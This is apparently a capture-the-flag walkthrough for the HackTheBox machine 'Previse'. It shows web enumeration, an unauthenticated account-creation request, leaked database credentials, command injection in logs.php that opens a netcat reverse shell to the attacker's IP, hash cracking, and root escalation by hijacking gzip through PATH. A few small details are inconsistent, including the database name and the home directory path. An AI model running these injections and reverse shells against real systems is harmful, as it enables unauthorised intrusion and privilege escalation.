HackTheBox: Previse
PREVISE (Linux) Walkthrough
ENUMERATION
MACHINE IP
export IP=10.10.11.104
NMAP SCAN RESULTS
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
Enumerating Web Contents
- Using gobuster to find the directories
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.11.104/ -t 100 -x php,txt,js,html,jpg -q
- Directories Found
/download.php (Status: 200) [Size: 2224]
/login.php (Status: 200) [Size: 2224]
/index.php (Status: 200) [Size: 2224]
/files.php (Status: 200) [Size: 2224]
/nav.php (Status: 200) [Size: 1248]
/header.php (Status: 200) [Size: 980]
/footer.php (Status: 200) [Size: 217]
/css (Status: 200) [Size: 939]
/status.php (Status: 200) [Size: 2224]
/js (Status: 200) [Size: 1155]
/logout.php (Status: 200) [Size: 2224]
/accounts.php (Status: 200) [Size: 2224]
/config.php (Status: 200) [Size: 0]
/logs.php (Status: 200) [Size: 2224]
A little more analysis from Burp or by active scan can found the contents of these pages which are being redirect to
/login.php
Retrive the contents of
/accounts.php
You should be able to make a request to create a account
REQUEST TO CREATE ACCOUNT (Can be Figure out using BURP)
POST /accounts.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/site.webmanifest/
Cookie: PHPSESSID=rk9dphd6i16kl9rvg6c98mc7lf
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
username=admin&password=testpass&confirm=testpass&submit=
Now we can Login to this account and can further enumerate the web panel
We found Some source code Backup at
http://10.10.11.104/files.php
These source code backup was uploaded by User
newguy
Downloading and Extract Gives a Lot of files to look for
Found Some Juicy content in
config.php
<?php
function connectDB(){
$host = 'localhost';
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
$mycon = new mysqli($host, $user, $passwd, $db);
return $mycon;
}
?>
These may also be the user credentials
Let’s try SSh, with below details
NOT WORKED
GETTING REVERSE SHELL
Lets Read the Source Code files.
In file
/logs.php
we can see a line, which is being executed using python script
$output = exec("/usr/bin/python /opt/scripts/log_process.py {$_POST['delim']}");
- So we can use a payload like
delim=hello;nc -e /bin/sh 10.10.14.2 4444
- Original Request
POST /logs.php HTTP/1.1
Host: 10.10.11.104
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://10.10.11.104
Connection: close
Referer: http://10.10.11.104/site.webmanifest/
Cookie: PHPSESSID=rk9dphd6i16kl9rvg6c98mc7lf
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
delim=hello1111%26nc+-e+/bin/sh+10.10.14.2+4444
- This should get us reverse shell
nc -lvp 4444
- Stablizing the Netcat Reverse Shell
python -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm
PRESS CTRL + Z ( To Background the shell)
stty raw -echo
fg (to foreground the shell)
USER FLAG
We currently do not have access to the user
m4lwhere
filesWe will have to find some way to read
user.txt
Let’s find out what is inside the SQL DATABASE using above found credentials
$user = 'root';
$passwd = 'mySQL_p@ssw0rd!:)';
$db = 'previse';
- Use Below Command to see the DATA from sql database
USE premise
SHOW TABLES
SELECT * FROM accounts;
- Data We Found is encrypted
m4lwhere:$1$🧂llol$DQpmdvnb7EeuO6UaqRItf.
admin:$1$🧂llol$FbsumqZUt.kJRCYaWurtw0
- Cracking the Passwords using HASHCAT
hashcat -a 3 -m 500 encrypted-creds.txt /usr/share/wordlists/rockyou.txt
- Password Found
m4lwhere:ilovecody112235!
- SSH into the
m4lwhere
account
ssh [email protected]
- We can find the User Flag Here
/home/w4lwhere/user.txt
PRIVILEDGE ESCALATION
- Lets Find the allowed files to run as root
sudo -l
- We found below script is allowed to run as root
/opt/scripts/access_backup.sh
- Contents of File
#!/bin/bash
# We always make sure to store logs, we take security SERIOUSLY here
# I know I shouldnt run this as root but I cant figure it out programmatically on my account
# This is configured to run with cron, added to sudo so I can run as needed - we'll fix it later when there's time
gzip -c /var/log/apache2/access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_access.gz
gzip -c /var/www/file_access.log > /var/backups/$(date --date="yesterday" +%Y%b%d)_file_access.gz
Here
gzip
is usingPATH Variables
to execute the gzip commandWe can Add our own path and create a
gzip
file which will be executed in place of original gzip. (LINUX PRIVILEDGE ESCALATION USING PATH VARIABLE)
export PATH=/tmp:$PATH
echo $PATH
cd /tmp
echo "nc -e /bin/bash 10.10.14.2 4444" > gzip
chmod 777 gzip
sudo /opt/scripts/access_backup.sh
- Along Side Create a netcat listener to receive the reverse shell
nc -lnvp 4444
We Should Have got the root shell.
Check
/root/root.txt
for ROOT Flag.